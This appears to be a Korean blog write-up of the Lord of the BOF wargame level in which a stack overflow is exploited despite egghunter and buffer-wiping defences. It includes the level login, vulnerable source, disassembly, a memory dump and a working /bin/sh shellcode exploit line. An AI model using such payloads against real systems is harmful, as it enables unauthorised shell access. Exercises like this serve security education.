반응형

login : orc

password : cantata

 

/*
        The Lord of the BOF : The Fellowship of the BOF
        - wolfman
        - egghunter + buffer hunter
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])
{
        char buffer[40];
        int i;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // egghunter
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }
        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // buffer hunter
        memset(buffer, 0, 40);
}

  이전문제와 동일하고 마지막 buffer hunter가 존재한다.

memset으로 buffer을 0으로 만들어버려 buffer에 입력이 불가하다.

 

0x8048595 <main+149>:   je     0x80485b0 <main+176>
0x8048597 <main+151>:   push   $0x804864c
0x804859c <main+156>:   call   0x8048410 <printf>
0x80485a1 <main+161>:   add    $0x4,%esp
0x80485a4 <main+164>:   push   $0x0
0x80485a6 <main+166>:   call   0x8048420 <exit>
0x80485ab <main+171>:   add    $0x4,%esp
0x80485ae <main+174>:   mov    %esi,%esi
0x80485b0 <main+176>:   mov    0xc(%ebp),%eax
0x80485b3 <main+179>:   add    $0x4,%eax
0x80485b6 <main+182>:   mov    (%eax),%edx
0x80485b8 <main+184>:   push   %edx
0x80485b9 <main+185>:   lea    0xffffffd8(%ebp),%eax
0x80485bc <main+188>:   push   %eax
0x80485bd <main+189>:   call   0x8048440 <strcpy>
0x80485c2 <main+194>:   add    $0x8,%esp
0x80485c5 <main+197>:   lea    0xffffffd8(%ebp),%eax
0x80485c8 <main+200>:   push   %eax
0x80485c9 <main+201>:   push   $0x8048669
0x80485ce <main+206>:   call   0x8048410 <printf>
0x80485d3 <main+211>:   add    $0x8,%esp
0x80485d6 <main+214>:   push   $0x28
0x80485d8 <main+216>:   push   $0x0


0xbffffc28:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffc38:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffc48:     0x00000000      0x38366900      0x682f0036      0x2f656d6f
0xbffffc58:     0x2f63726f      0x706d6574      0x61616100      0x61616161
0xbffffc68:     0x61616161      0x61616161      0x61616161      0x61616161
0xbffffc78:     0x61616161      0x61616161      0x61616161      0x61616161
0xbffffc88:     0x61616161      0xbfbfbf61      0x454c00bf      0x504f5353

./wolfman `python -c 'print "\x90"*15 +"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" + "\x90"*4 + "\x68\xfc\xff\xbf"'`

 

love eyuna

반응형

'Write-Up > LOB(lord of bufferoverflow)' 카테고리의 다른 글

[Lord Of BufferOverFlow] 7번 darkelf -> orge  (0) 2021.02.26
[Lord Of BufferOverFlow] 6번 wolfman -> darkelf  (0) 2021.02.25
[Lord Of BufferOverFlow] 4번 goblin -> orc  (0) 2021.02.23
[Lord Of BufferOverFlow] 3번 cobolt -> goblin  (0) 2021.02.23
[Lord Of BufferOverFlow] 2번 gremlin -> cobolt  (0) 2021.02.23

티스토리툴바